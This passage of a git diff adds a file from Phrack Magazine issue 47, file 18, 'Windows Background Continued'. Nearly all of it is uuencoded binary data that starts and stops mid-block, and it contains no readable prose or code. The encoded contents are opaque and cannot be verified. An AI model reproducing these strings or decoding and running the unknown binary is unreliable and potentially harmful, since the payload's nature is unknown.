+M&3]3TZ_E6_IWA&-GBDU`/]F8*T<L'*N/<]5/Z>]9RG**,XP4F:NHZ%IEM"7L9
+M]25EB_>/]HB27<,<8+<]CCG!K#U/3-,FLXQ::A:O>9^8)!Y8(^H/]#64:CO=$
+M(TE#2Q7T<ZM9R-:V+%6D&-ZD[>2,D8_IDUZ=IWAZ1HQ(+E(YF^9IEC=6=NH)>
+MR_;G&1Q14MS:=2H-I:FH;B[T\1^>(KB/&#,H(DSG^[SD?CV-4D\007,[SV4GV
+MFDJN;=R4E&"0=JD?,>G&?QK+H4DF:EE=PRQ.8I00[$J0><^M<UXRLI-5L+2W=
+MM0?M(;='MQD$'U[=,_A3C*TD)Q98\*7-Q&DL,XV3Q(J3J1@LW+!OJ01P>:J^A
+M$IKZ'3Y;&.*!8X9Y(7F9\%!NSM`Q_M'')_"J=M;!U-?4=1A@CD^1HS@R;G7<0
+M``!SU]*\I&E7.L:E<WM@&\@REE9AD.1R,`]:=.2C>3V)E%NR.N\J75=%6UNV9
diff --git a/phrack47/18.txt b/phrack47/18.txt
new file mode 100644
index 0000000..ff2c49d
--- /dev/null
+++ b/phrack47/18.txt
@@ -0,0 +1,718 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 18 of 22
+
+Windows Background Continued
+
+----------cut--------------
+MM);D,=P$9R.F3RW7WQ6-H=GJ&@:W++96XEA&%\N:7:9#UXQT/IFE"<4G%[%.<
+M+NFCT6P\465[%.V&A:W4&595P4)['_'I7/P_$JSGO)(C;D!79,[@=W(`(^M."
+MTF[+H3HMR#Q]NO--B>V(",NX#=[5Y3NP2#6V'=TS.JK-'1:9>Z=(QM;MI(X6?
+MM3&70$[7]?7'K6';^4=PF+#CY=O<UI%25R9-.QTNG1ZMKVF"P@:"*SMR0TN-I
+MID]L_P"?>KVA6]EH.NN]\T4:QPY4LP[GM@GT_6LI-*\([FJ6TF;.J^)Y9[8_=
+M8=UE8,-KWLG#D=<1KU_$URNB76GZ6]W>SH)``1&@.Z09SR">]3%-1:075[LA8
+MU:^A.HK<16:6X8GS81PA/T'%.LM7N(H9H;>2.,.6DD)`^8=U&1[#`]JTM[IG\
+M?6Q9@L[>YMWN-/N&<Y(Q@C;CM@Y[8YJM#8W-_*$?RXXMYR9BN#@$YSVXS]*R2
+MC+5WW0VNQF(H^U'?$N%Y;<H[>U+%)-%=?:2`=IR&?D8QQ^5;O4@V;91>V\GD7
+M0&YD^4Y!^9CDC!^O%)-8E"PNOL]BX0A8]I+DGC''UK).VGX&T5=#SH_E3Q-&?
+MIEC<;@H^4A<=Z@MK0#4BKJT:9+*N,<X-4IW!P2#[+&-6@AN"ODB8MP`1@\_SF
+M`K1T[2UU&YD(N?)D#<B50V[GGM]*)2LKB41^I^$OM=^T5G(LS1J`Q4JI5OKV-
+M%<YK.CZAI:O%<K'*JMEY4"N5..C,.>].%1.R9,X-:F*C[&5P<%3P1UIZEY[@I
+ML2"S')9^1^-;^9DCI['3/LL+7+V']H6X5M\LD;)M`'ISC'/2M'4(-.O-(@B@/
+M@BB,9W2;"$#@=.0/0GKSR:Y>9\U[G0HJUB*'0+:73/.QB-G`90V613SQ^E1OQ
+MHL[Z:#+"V]%+*@8?N]O#$CMG&*I38.")+/PG'<;MMU&\@95VJ1\N>Y]:['3_7
+M``QI^G[620.P5E&YASG'./48J:E1M6",$B/4O#<5_/(]S*51G0AN<C@@GTR>1
+M/RKG/%-M;6UW`+21GC9"26;=SG'6G3E=I%6,(4ZN@88HH`!2@<T`&/:E(H`0O
+M#\J3'S?A0`NVM;2M5.F:9J$<3E+F9H_*.P,."<]>.]`FKJQI2:[;7:21R7$][
+ML\UO`K7,<?S!T^\,`C@Y[5(WB>W^U))&;B-?MRS.%X+QA`IS@\DD9Q03RLAM,
+M_$=N$@6X,TC;9T>1EWE0[`KC)YZ<BLO6KZ/4+U9(2Q1(UCW,@4MCO@?U]*8T9
+MK,OV^M6D5M;NZW'VFWMGMQ$,>6^[/).??D8YQ6;J-Y'>"S\M7'D6R0L6QR5S[
+MR/;F@+6*)'%)CD_A0,7%)VI@&.*0@^E`"8I:!!BEQS0`A&T<BLJ>S$DUR\DHT
+MCV@%=PX;CIGMTI-V,YJY6ACDA=9%174'OR#[5J'Q5J:3!XY2A`P0``.!C&`*,
+MSE",]R(R<=B[%KMUJHG1K='9E^;.U>.,GG_=JWHVCR/J4$UW:"-6.Y(E4$L!5
+MR"O.*YY)4TTF:1O)IG537T<[1PO9[FD.`[(.3D9;'?J.:ZF,&VL@\TFW;C=CD
+MVZ@>]<RT1N]CE]<\5&)MD4;NJL-P5L.#_*H+_5VOHH(Y[9XB`)%=H<,G.3M[<
+M@_2JC%VN)--V&Z<-4\V5;>56Q,0QVDX.,`'\?PK8TA&DNU>2Y=KA(A(H&-H!P
+M!&#^.?RHE;H7T.<T]YK35M0@6262#82&D;&XA3M.>WUK0TN&Z@M=MO(YW,'&S
+MU<Y<]6?."1T`'4X[]*MV9.IA:Y>F]\NVC9U53MF9@R@*.N<Y(Z>WTJ)_$<)MO
+M4LX(_+(&U&8?='X5:IW5D1SV.9M[N[LKAGANVB8'[X8Y_,UJ'Q1._EB?YROW`
+MF'\7O6TJ2D[HRC4<=S0N-7&J[8XH?(NE)5+C.'VYSMX^\/8G%<E<;EN&(.,'_
+MDC(ITERZ,*COJCIK7Q->O!'$5+1[=K.6P<CG@X].U.U[0;+^S!J$3&"=CGRY[
+M'SO&>H(]JR2]E-6ZFC_>1N8L%A%;H\U\P81.5:.-LG(Z#(XY^M9G4D@`9/3T?
+MKJB[OR,&K6/1;;4H8-+2UT.U>\:%-K3L-D*G&3SU/.3@5Q-[-)#J9-P5GE0_@
+M."HVD_3&*PI+WG??\C2H]%V)1?PJD@6UMVED7&73)'N/3\*H3_(P7.!],5O%J
+M-/4SD[CSYB*TK,I1SC!.??I3)")=HY)'.!0EU1)MV5RHL7C6=X&93O55RKX(!
+MP"3C'_UJSWM9TY*HBE=[$'H/?\ZQ2Y6[E/5"1011J1*_F;CU49[>OM1(8HA(N
+MC3.8WSA003[`FG=OH+8+#*C?&6VKD\.5Q^(K>T>X:U5KTI).C'8PSDL1W!/.[
+M![4JB31K3=CHM1U^1=/BD2%[4,BF+<5Z$=_;%<9#J$5K="XE1KJ4XP7;@'Z5V
+M%*GH[,JI/8T5\2&UB9H(H8I)#G=LW$<YZFG6?B>>5MTQBD7EMHB5<_7J:IT>1
+MI*J:EE_&4Q7R(K95WC)4(,8//I[UFW^J2WMC<1.@3))&SA>W'Z41HJ+N-U&U*
+M8Y=X'C`+*1GD"M?1(K?S0USM193U[(G?WK:3NM#*.C/0])66'08R4)9F=(HBJ
+M-QV_4?UK&U.6".[DE@O8DG6(*B`9,BY/R-[``<]L5Q17O,Z6[1(6\1VG]ER[?
+M1)YY7"1O@@`'N1C/)].:SO\`A)91!&(U2.1%Q)OCW;S[#T^IKH5,R=0KR^*K$
+M\RNT.R,$;<;`#C\*;+XFGFV++!$X4?W0,_I5*DNA/M&*NO[)#(UA$7VXSO(.'
+M"/:K$^JRZND+R1K&L2^6JKT`Z_UIJ%G>Y<9W=B`"G>]4:!29QWH`M:?83:B\`
+MT=N5WQQ&3!_BP0,#WYK0;P](ERMJUU$+EQN6,*W*YP3GMWX]J8KV%?PW<+=ME
+M;I*CL(FDSL(Z':!CW/2JUUI9M[3SUN$D*B,R)M(*;UW+UZT!<H4G\5`Q<U8M[
+M;7[3%<.9-ODA#C&<[F"_UH`U6\/1J[(;ULQR%)2(AA`&(R1NR.G4C'/6E_X1C
+MQ712ETPDD;;"'5<,<*1R&YSNZC/2F1S$5YH262DR2W$F]V6'9#U`4-EAGC.>D
+MG;!-27.AVUM/<*9;F58"JL(U4LQ+8X]ACGZBF%QUMX?ADN%@EEN(R%$CR&,!Q
+M<$XP!V8?4]".U5-8TC^R5M0TI>24/N]!@C&/J"#2#FU,LYH'!-!0A-:&CZ8-!
+M3FF1Y/+"J`K9`&\G"CG\??B@3=D7X]&M#<I;E96E$*NZASD,0O!`3@<GIN]\3
+M4-HMC&RQ,TC7(4LL2R`F7&[Y>!@=!R"<^E.Z)NS%O(?L]RT9B>$@`^6[99<@1
+M'!/^346*!AM]C28%`"'KC\:SKR243L2T;1PX81N>I(]._2E(F6Q;T[6[6V2)4
+M+F)Y06W2G&>_8<9X`SDU?TZVTG5KR8.I5601Q+W#'OGIG//XGTKFDI0O)!&4]
+M9:,WO[(@T^TBM1*B/'B1Y-H<'(P!^C?Y-;-D(+C24'VEUD$9``D+!0"?X3G'M
+M%<<I7U-EH9OVW4;!E<"RU`L`5&?+8#H`.H/0\>M9NL>.)9QY%S;26[8SM?@CF
+MVZ?K50I\_P`+^1G*;17\.V>HZM=AH701J^_S6;.<#'`YYY/.*M)++IUXT+E9\
+M2C*S&3YCDMR23Z`?^/"KE:_*BZ::5SL]#CEAT=&F8%I!ECCA1@_GS5G282@NW
+M6B"LJJ`KYY9LG.?;I6#W+>S.6GMX9_$KZ?\`9V\F>)EW`D<X.0/<G'T`J>ZTY
+M^Z>Y>SB=9%*[IV8E0!G:%X[8'3O^.1?-L,P-66QACOK=9EC=(RQ6%AN<^Y)P^
+M1[`=\YKFKF+[)9:>2H0S+YS,5Z\G'/7I]/ZUU4F[:F$[7(KY(_/V(0/D#'ZU?
+M76RG+;8E+Y`.`.QK:+LM3*4==":*.\BN$)@D+9X51S6A!;322R7K6H6/&!'-0
+M;R,N?^`KCM0^7HQJ_4FD\/P3-&=*U%'$C$2QR`#8P]EZ#MFM-PNBZ4MIJFEO,
+M9I<RKYMU%+YB%`<D8'0G&/QS64I<UH[/\RU'EUZ%3Q181W5I!J]F4:*4`$1@P
+M<#W]\_SKE`IWA2"#GIWK6D_=MV,YKWC8MM9O%MFLHY)B&^2-(OE`)&```,]?>
+M>KM]8VZZ/&KM:031*`R_-OW?GS4\O(]"T^9:F))%&%$N]G;C"!=N/K[5)?L",
+MA,BJ)3@`!\[1Z>__`-:M>QGT)X8+4V1B.W=O#[AR>A'\STJNN!(0.(U!]BQ]V
+M/\]JF,FV[A9(GLX/M`:*1\&1MRQE>&P#SQT7_(J]J=A=K8HTLF?*7)0JN%&>%
+M![GO@U,I)22&E=&5,7&54[&8?="XR.U6(M$DDAADD9E:4X52G]?R_.AOE0DK$
+MNQ8O8+6&9TAD\F*/*_*<@D<9_&J#3&-1Y=W*0%)^3C`IPU6J'+1Z$JZ;<W`1^
+M^2FS<.20`,?XU5-K(FT["<]`0<G_`/75J2Z$M,O26JB#;+AYV(.%(.#DYS^&V
+M*L6,/E6HDCC(W$8('^]Q_GTJ)/0J*U+5G87MY"DZ1.T3`C.!Z`?I5JW\-7TED
+MA.[O&(@2Q8L#D=L?D?TK-S2T-%%V.5DN/W,A=P2!@*1R?QK9M[6Z"03+%'/#A
+M$H#8X4``#DGC/M3G:*U(A%MZ'5:WJS6/A6ULE"QW$L.]UA)'EC/0$>O`KSU%O
+M+SC`SSDX_K125DV.IO81X),"1D90QQG'Z5+8H)KH1-*(E8'<Y_A&.?TK5O0A1
+M+4LRQ+<&&&RB7S[@[F2/^$9^53Z>_P!!5&:RN(KTVCQ.9PVP(!U^E*+Z,<EVB
+M)-2@FL[PI<Q/&Y5>&ZG@#^8JSIY_T<X_O&J3T0X?$6L4M(V#M]*3%`#HIY+<V
+MMY;E"PVDCTR#_,#\JNG6;]F+M<G<6W;RJYZYZXR!D9QTIAH(FHW]L=B7$L1#K
+M;\#Y3G);\LDG'3FDGO[R]B$4TK21ISM"@`8&,G`[=.:`T*N*3&&%`"X]ZEM[8
+MJ>TD,EM-)"Y&"R-@XH`D74+U41!>7`1&W*/,/!]::]U=SS*QN)Y)=V5.\ELX8
+M`R/?``_"BR0%M-/UE+=@D5VD!785WD`CKM(S]>*@EN-0AG'GW%VDR`@%Y'#`Y
+M'J.3TI>ZQ;D(FF6-8Q-($4Y"AS@'U`]:8SLP&YF;'3)SBJL,0"@CG\*!"<>E+
+M.BB:9V`*J%&YF8X51ZDT-V5P$$EF"/\`B80`XS]R0?\`LM()+%B%&HV_/`RC`
+M@?F5IVG_`"O\/\R/:1[CI(&A<HZX8<]<@^X]:3%"=RA"/6C'YT`(O))]ZKZOE
+M?0?V;'9R6)\T$NEUO]>P&/ZU$DW:S)D]#&M+.6\D:.%2[A2VU1DG'M5^*Q1B.
+MAAGA92"#O7&2.H!(`S2G*QDD=9I%QINGB$:@EO)$J\.GRO$PZ'>!DC&1P3C\J
+M:66ZTR:RG@FO9(VSE&642;\]P>"#ZUPR4F[V.G1(JZ7I&FZG,DMUJ;NG&0S!7
+M74CH"?Z^U7;[P.PN#<VQ^T0L-S+-G<_?KZXP/ZT_:N+LU82IIHZ;1K&TTL1BY
+M.'R-Q`W8QN/<#D_Y%4]?TEGF>6,EE\OY4XX`/4^WMWXYK&+;=V;[:$)ENYK*?
+M83W1B:4XCYQY:`$9'UR.M=%HU[:?V9,T,T9*\2;>BD?_`%A4NRV'):$=G:PGD
+M4/.3(="6=CQN;H!].:;JUG"]H\=L_E&1LLZDL<GUYS0GH)[G-Q>&&U%Q#-<J*
+MEJKY;RF4<]`N.O'/YU+KGA"*[OH,S`0PQA%39T`Y/.>>O2MU5Y;-$N*;L2GPK
+M?I,]PC%1OB`#,X8[CTY`]_0UK#PII;1;H$1`%VDQ!D)'X]*E59-:L32B[V(;O
+MC2]%A8[HXS<,P9B#AN/I45M=NT\JPVLC6JL,N&SM.>0,]LXJ5*[U+2=B75M+Y
+MTZ^E$EU803!GP9/(R_XL!G%4X=$LH89UTNXNK0`D>7`^Y&/?Y&)4_I5>UEL]<
+M43R*UT<;K6C:II<<LXL#'`V1*\`'E.OJ4YV$>W`[8K`NKH3ZF]W&NP,^]5STN
+M]J[Z;4E=,Y)73L7;:1+K4XYGFCC`;)PN]MW<X/4U=U"[22>!+:2[>X4'$DN0&
+M$]E4@<^O2AJS2*3T,BZMYK=\3,?,90<*PW'/3.*M6&DI>W0^V3)`K=PWW?KZ>
+M?C5N22NB5&[LQNH:<--\@,51FPY(.3@]#^AI[-`\Q**I`P(DV_>8XP/J>]9*8
+M3:N*R6AIF!!,9K7&2OENT9)W-P#M'7!/^<"M:;2KJ\B9[C=#:@L6SR6'&!]3W
+M^'%8SDE9LU2+>DZ)::?HIGOUBCNI"W[M\?*`>!D\U;4PZS,D=FICC@'R*ZX(*
+M(`X//3(_*LI3;E<N*LC#;PE<V_FI;.9?,#;I,##$]%&3G&<5D_V)J,#S>3:RN
+M,T4>YVC&`&QR`W?MTKHC53W)=-K8W;+3#8V2+)9R"68#S9&4;4#`<<]\_CUJD
+MW9^']\<0C9)/F^<X.$`Z$`\9QQ^=8RJ6N6H%J?PS'/*)#(/*C!'EHFWSCR!NH
+M.>:NC0+.XM5MY$:%+=AM9#T^7'!]LG\ZGVC=BN6Q8FT1GB-O:S/;6GE[!M&"R
+M3C&1FH=?CL]#T"]G#F2;RR(A(<[21MX'XT1:O8&W8\7/)('/85ZA?^;>FUAL3
+MY+5-,SYFQ%RK$'D'../\*Z*^C5S&CU,^Y\-7-P\]LUP^PL"DI0E>%Y4<^U0S3
+MZ#;:9#(OVL1I+&@E,BDGE3]T<<YSQG^53&IT13AK<JWFB02WT4>G3.1(5\T2*
+MXSAL8(Q]2?6J&LZ,;"YFCMRQ12(TWCE^,DC\OUJXSU29+@3:?HUQ+87<D+1KH
+M*;=63!((VD$D?7UJ6VT^^L2;U66=I1LCE?YGB)'?/?J/P-#FM4QJ#W,G5K>0H
+MWTYD<R-G#.S9+$=3],]*DL8FBB9'ZASS6T7>*(BK2+8%&#1<U`BCZT#)XKE[N
+M:ROGB(#+"&&Y0PSO4=#QW/YU!)>:K%I0U`01VZY&)!9J,@]"&QQ^0]C6].*:?
+MU.:HVGH.@76)-0DLEDDO3'&)&+QK*5W*#C+].6QU_"I[*[O9K35(;S,;0&-?I
+M*V!`F6(/``YX'-7.,;-HB#=TB`]*:<[QS@8Z5S'6.%)CWH`55+$*O)/`'O71K
+MW#0>$8;82[6O[A=^-I;8/5L<A1TXY-%KNQ$W9%-;[5"0IU!`HV$0)&I28G()6
+M#%<C`QU!SZUH:?<0:[.-*U%E%S@[)TC.POC)"DGKT)'0CL.]-J2T_K^O\S)7+
+MB[G/W=L]G=RV\HP\;%3CVJ$U*=S</QII'SYR>E,!:<5\RQNX3T,9D_%/F'\BV
+M/QH;MJ)ZIDWAS1;34[ZT,UN&2=R6522J@<D?I^%5==TE-(:8K#EHI3'M.2O0D
+M_,/RZ?3TKMYM;'`69T$7EPJ<K%$BK_WR/ZDU":X8NZN=^PE(>>@QG@"F`WI@F
+M"KVFV:ZHK64J;USO3(X#'C@^N.0..AK.L[1NN@TKLUM&\-?8IE1[:*-9OE69:
+MLN&;H%([=SQU['M6/XKTC[/KB`6B1J$+!$7:'&[V^O6N2,VYWN.4$HV*>IZ$R
+M+73(KO3[HSK$`TB@DH"W`V^N""#D`].O;GVGFEW'&%!W$`<9KIIR4U=F$XV=?
+MC8T'3;J\E+0L@51EP3D8]Q7J-KJ20V4,LS,6VJI0'=D@`'W[URXAIRLCHI1]M
+MT='*FH2*@8JA?>AV]<`'^M)J$L\DC6\4+*N`6F##Y>>@'K7-L;=3,EMITN7,M
+MTL`.=Y!QC'.%/Z?E4-I;7.B6HCB`*SRYRQR"3[=JOI8>CU->WN)TTP2H0LCG:
+MYAC;GZ'UJM*;R".$Y$P'1A\I/7CZ\<U-K,9?\J^M[I&%O`R%MS-YG3/)X]>*)
+MS]7CU*XGN'BAA.P;ED5N&`['(ZU2MU)31OZ?:NMG&6*@L"S$#(Y]*DEF@M8FZ
+MDDD)VG;@#J?I0U8C=Z&"FD2WVJ)J$Z*'6(JH#_=;L<8]/<U1U_[>CPVUC;D?:
+M/ACOVAL]LXIJS:OL7MHC<>;[+IB/-:W+.-K%54.6_(T]9=/A(S<1Q2..KG:WN
+M/^]]/TIJ#>Q#9#YL"LZ)>Q3I\WS/-'A1Z<'I^%>.ZK!#;ZI=0Q86-)"$`.X8,
+M],UUT$XMF%5W2.C7Q+!9VJV&CVLF-@#R187><<G<1D<UGR37EX'DGO8(/+4$R
+MB)MS?IP*J-/E]Z6K!SOHM$06TUA!&&^S3M*/^6D;DDG\P:>VJ6L,SM$DI4\;C
+M&9NGYU;C-L2E%+8758Y8=.ADG0@I^Z52P)7C)&,\#OVZFM.W\+Q:K-!;0:@L\
+MDR('GGC3]W$N.%[;FSQ[8K!R<4F"C=ZFY8V.EZ5-'9-++=W7*@J^Q5[GGMC'G
+MZ5IW$=M+NBW+)<A0RY8KY8`_C/X?6N5MR=V;I6T*=U,(;@136[7,C*`QP!O8I
+MCL.V#_6FC7&BG"7NEX8\(3*-N.G;K^&:25^H:HV]/"+:!IE:$'Y(QCGGMQT_K
+MSTIZPP6]F_D85';/+X#`=`.>O^%.(R"V>2]N8_/G"1J1((40J,`XR>QZBK<T5
+MMLRNBIYK]<#C@<]:'HAI:C8F@MH&'V>,KO.X;@$7/7D]?I3EG$CHP\@0J?D9E
+M1Q]>F*%(;CU(;G4KF2>.*(H&)P'.2N.,]*Y[QN+6XT2ZE*M)/&1B3!&"2!T_D
+M"KB_?B2U:+/-+5!)<Q*2%!<#+=!S7HOE00PI&TZR)GRPZ<+SR2/R-=.(;NC*^
+MALRTERT36L-]?1,C`_*"68D,"/KTQBK5G:KJ%]-(R>>L(V$.=P#]\#H/3/M7H
+M,]%=&R,[5+"]&KB`QDNB$M'!\@VC@\CIUK2VVD2+%!9Q@N`9WD&[:V/7I^/%Z
+M$G9*P+7T([B^LX%BC2Z1`8\R".,<CUSCI@$4DVNZ9>-\\F5MQO90@)`R`*E*2
+M6XW9&=8Z+:>)+W[3LDB@*+Q#@!6!.3FJ7B"Q^Q:@HSN\R)7_`$Q_2NFG)\_*M
+M^AG9;F5BBNDD*;0!:M1%':75Q=1/+:QF(2JHZKYBDC^5=G>:G]NM0NF/!>+>U
+M1,(S.P4#C!4J!SQDX.,8JW+DAS/9'/-7E9%6RNYK/5;G3WB1+4$.USG:00H!K
+MSG[W3'MFLS4;ZUU2^U>XT\/)&EM''-*P'SOYF0?P`Q^%7>ZNB(Z-)F'@XZ4AA
+M'(XK(ZPQQ2=J`+NC[/[8L_,^[YRY_.G^-H;^\\974=KYA80QKM5L94XX]QN-"
+M73:4M3&KT-+2=+U1+"XAND@*.(P(Q=,N#GY@<`]1Z=,5A/I>KZ5X@L)+R15FY
+M:[0I&CDC&0`1VQC(]<#FM$H032UN8\S?R-OQ@$'B*?9W5<_7%858(ZEL`IN/_
+MF'3I3&&*ZC0M#&I>';XB*-IY`RQDG#=.F>P)XK*HW96$]F<EIOB&ZT*YD46ZF
+M*5#)Y9&&B[$<_P">:34M;N?$-^B&WC<R,N(D!S(W3KCKR?UKTM/B.*SN=CX@#
+MT9;#0;(%8_/B")(P'+?+CKWYKEL=Z\VE>S3.T:125J(0C\:V-&GV6%U$4CE1L
+MV!9"<,..&4^W7\!6-?X&:0UD=39Z@(K4Q/+YT00L8I,-Y@[8;UR#[YK32YBN"
+M9,7,6$=`L;2XWYZ[3Z]>M>>I7W-91L>;:]IKVFK3QVTAMK&5O,C2(G!.>F.GT
+MKQ45O#!+;.EW:)&PRYF5MA8XZY`Z>W-='/>*:W_,Q<;/4K'3;S3(TO;"</'Q'
+MN5CSSTJWI.NZA$[1RV32;@QW(2",GMU[U34:D;[,E*4'8[`7DR6(2U5Q(B$L8
+MTF>.>H`'3K^E/M%DN/,:ZN4'F2+)&5;Y5P/N\>O]:Y+(ZB>#3K><XCDB8[UW]
+M87<01TR?IV]ZNW=@7LPD3>8ZL"CRXP#VZ_A3%>S'()/LY\],$@;N/TYI8Y8)_
+M;>6.$G<BY"9Z'MG\:5@?D64@B%GNN2KL$&Y]N`>G./PJC<:C!',@=)\?,$`05
+MXSG%6_(A:LTWFDE;$*GIU/1>.36;<W=N;D)*PR$W!7Z>F[ZTF.*";5[71K0&3
+M;=(=VU<#OU[X%5=4\26MC8)J-U;N^[`CC&/,/K[**N$7(F3Y=3FO$7CUKB*W%
+M&DPM%L(?<3R#Z>_U-9,_CS7;N)5\U82O.X=^W/%=D*2MJ<TILQ[G4KN[Q]LG?
+MDF?.X;CD`^H%9SODMN`!SG@8_2MTK*R,[CX'D1P$R,^G>I;J)H6RZ8!]Z`Z$D
+M$<HC(*EU/L<4&0,,`8`Y^M585SJO%%M)%X<TT&YCG^;DE"DBG!&PC)R`0?\`5
+M"M3PW;"+2H#</%Y+J`HCFZ')Y(`(_,UY\W>GIW.N"]\=<7*:C.D,3)!;JV1,"
+MN2S=CM/7'O183RZ9>2\L!)QN<;FZ]`<G.<\GJ:QM9<I;U=QNC27%WJTOVP>6=
+MOF$J67IWQNS]..:U&2*2_,1D>ZC)\Q9G?[F,C:`!R,]:3BKZ`F^I9LK)]/GS4
+M-,\[REBK%^/4$`U+,;TE8I(873.$+MUP,_@.O>EU+5K$GVN!87::1=JHJ@%PU
+MV&QTZ>WZUS4OB^.6,Q-!(R(<ETX#`'BKC%SV"_+N6;74(-69Y&C,JQL&\HL2R
+M![8'Y_@:W;DOJ$!3=+$V-ORC:!GT_+K423B]2KIJYE1:;=0S-*L^Z)%Q&TDV,
+M?FYR<8'^367XZLDL]`C8';/)<*'0-VPQR?Q%:4VG-6,YZ19P%G&\U]!'&`7>;
+M55"DX!)->S#2+>UM?L]_<1":4!5CB7:`?;J3Q6^)>J,:/4RK2?2[:XN$+P+(#
+MX,:RN,J5S]W;GCG\ZV;*ZAM)DL+"T+!CDL%"IN_SFN27-U-U8607,5Z'GD!#%
+M@\%1C'/+,??MBL9[:%[$V]S?)*7=F;8F6*$\#`[<?IWIQL@9HV-E;%/(M[:.'
+M&%UPYVDGCCH>@Z8J1O#&EO;RF"'YV0Y([MDX[]0?Y4N9IL#9@DM;.T$2Q,@C_
+MC`,BI@'&!FN%\:S)/K8\LDA8E7!'3DUM1=Y$M-'.4'CBNP@0FBF!O:+>VK0OP
+M8WL8,4BE2.S`_P`C_@/3E;/PN^FZK%>6Y6^LU)'R-LF0=.0.21[=:SYK*5-_.
+M:V]>QE.+YE)=!\FG76LZ>L$=I]D17RUS<S$AE!/W5//7'UQ3Y9+/0-.%E9-Y\
+MKD[WD/!D;'7'8?T^IJ5[L?9)W;=V%N:HY]#G>*3N*W-0I<4`*"RD,K$,#D'TW
+MKH]0+:]]BU>Q*Q:E9J%E!?"R<]#Z#WZ<X/K3B[21E45XBF_GM90L=A<KYB_,L
+MJQNP0XQC(X&/8TY@TVK+K%ZR!;8XAYSC.,GT+<8`'U..E;RG&W,NIS0A*]GTR
+M,*_NI+^^FNI1AI6+8]!V%5AUKG6B.W8",$C@T8Y%#`,5K:%K<FC7);89(7X=,
+M,_J/>IDFUH!TLUEX;\79,BJMXRX#CY)<^_8TL&G>'_"/SHB+<!<;V.^4_P"%6
+M3[1\O+^']?\`#&7)J<UKFM/J]R&`*0H,(IZ_4UDGBJBK+4T&'IBCMZ58!Q3'5
+MN'@VJLBQA^,L1C^1J*BO&PXNS$75Y+7(2XP^X?<4%"!^6#P/K5RX\6W<X,2RI
+M0A9`"S8Y![]JY713U+]I;0SA<B[G$][.)2F1M`/S#.1DU%-9Q^8%M[@*N2_SM
+MOP/J/7CM6B]UV2T(:4EOJ7=&T\FSO)I;M8L`!,C@G(SG/0<FK<$LME"674HPV
+M[*5"$\$=CC!J)M2;5BX+E6K+=K>WD,+R+<I(=H547@]?KCWQQ6AI\\MJ93/>.
+M^8CA>?XDZY'!('2L9)=$:(LC4/)N=BW49.[Y68GC/4`=^U6S?2.A\NY5I"">%
+MY(./3IZ5FU8M:C]/^TW4P++.`582-+D8Z=/2K206XF=H@(VD"JK$<DCIG\J+U
+M6);2#4?M3P+)9>2Y6/8OF$!<],_I5..TMK13>W_D>?P5';(/49)QR:I"3-H:`
+MW9PL5$J!F!Z,,?I7`^(KJZO=1BDL'9'B'[HY&-I['%7#XM2&G;0EO?+U(VZWF
+M[RQ.GSN-R@J^>#SU'O6-JUOJEU:&6]\T+&<J6*A0.H`QU-;4FEN9U$WL9MQ:1
+MR00(`5/&[@<GW/TJ"W6VC<I/*73/)C[C\:Z5*ZT,+6>I(]F9AN@G4*!D!L#'T
+M'2LV0,KD/C..U4I7T%*-B178Q8&$`ZG/)J4Q37`\[YY%'&]SU^E/1`E<<ME%K
+M]G+F1MW.,+P0*A$`;&PY_2A2!Q.E\5W5P3%'$CQ:>\I>-9@-[,!@N1U4'T^O[
+MTK=T.RGG\/P+$QAAPO\`HZA5,AXY9N2,GMZ=>N*XIM*FK&\=9:FG/=VT!V6B_
+M0Y9<22MC!7OCOP?PJFVI:=#')))O&[;Y;'Y=O&,@GKSV&<>E9139L]$9T.JS-
+M7,?V:21&)`("'[QZYXY_#I6E#:/&/-GU1T8@+B55)8=^#GCK^=*5HZ6*BFT%Z
+MM!8C47N;6X8F)"0&#*H'KSP.>]7A/=OYS1^5(F<!(23O!ZG/:HD4DD`A@:?RF
+MKC[/F:,*B*268$<Y].F*2?PYIEMICK/`[+G.`Q!^G\N/:E%R6P2LRGIFH:7:I
+M74L&FIY,)8[Y'D&UL=6ZY/H.U:%OJ$.IJD-O#,D:YW%G"!AG&3ZU4XROJ3';]
+M0N1M;I*OVE4+(^8]IR$`[G/%<3\0GM_L]BT#JQE9BQ&3G'?)/3YJNA_$1%2_,
+M*SD]$C\W6[&/)&Z=!D=>M>P7EO!)+`QBBD92?G=CE01VQQST]JTQ3M)$4-F5C
+M-/T#2+1HW6U1I.,R&5FPV.F/85N1S'8\:0FWC4X!4#GW%8.;D[LTY;$EP89(L
+MFD;*,08U[]?0>]1BRL]R,+<;DQCC&,>F.O>K;N3JA8-I!B<"-6SR>X].>2:=E
+M:*4`W96->3QDM6++'S^3+<&22=H]J$B,N!TY/%><^(YA-JK,"QRH.6`!/)YXW
+MKHH_$2]C()YXI"*["`Q[4=:8"U=M-5N;-U:.4G;T#'I2E%25F!+=ZU=WH7S9&
+M.1WZFL\DLQ)))/)).2:48J*LA!CCDT8Y'TJP%]J.*0Q1C\:EAFD@D$D,C1N//
+MXE.#0TF(T#KU^8A&TB,HSC,:]^O:J5S=SW3!KB5G(&`#P%'L.@I>K$DEL5S2`
+M>M6AAFEP,BD(7&*!0,<CM&ZLA*LIR".H-+)*\TC22.7=CDDGDFBRO<0S&<4T*
+MTP$--IB%S6?JR#RXF4`'><G'M0R7L9BLR=,5*'3;AE`/J#TJ&B4Q59%=2AP."
+MX8X_E2B>4`+N+!3GKD?C2MW'>VP^*?,@#$@$Y;`S^E#SYN24(]<[<'BE;4.;L
+M08)&1BT;X(^;/O[>]6X;N7R5$,LS./O`_=]L>OTHE%,(R:&>:[;3&Q$@/+;NS
+M!GD?CQ6E9:IJ=K#FU9;K)RP.7.?ZU$H1:U+C.2V-"37]<:WC2$!)02Y"@`=LM
+M8[C'-5C)K4J-+-EE/.5(SD<]CBLU&G$N\V4H;S4W!+2S!`,B.1B!Z5H"6YOU'
+M,=X&"A>#R?YGK52C!:H<92>C('>WM8`+>Y).#E)`#C_(-8UQ=M+)CE!G)V'%`
+M7"-]614E960]K^6:)(WS(4SMS@$9]QR::NJS0A89BYA4_P"KW';^57R+8SYVF
+M2+<1_?B8EF7;MF'`&"."*K+%Y?F'&[Y>-O--*VXF[[#VFD(W1R`@<[<]*J3D=
+MAN<9QC`Z5458EDEI'&P8R(2O3('W:V+V]@DL_+M(%3>>>Q..G&:F2;DNQ<6E8
+M%D,R/]ECC65%=0S-N?K6<&58PH/S=\<TXBD;7B74I)H;*TE(WP%RZXY0G``SK
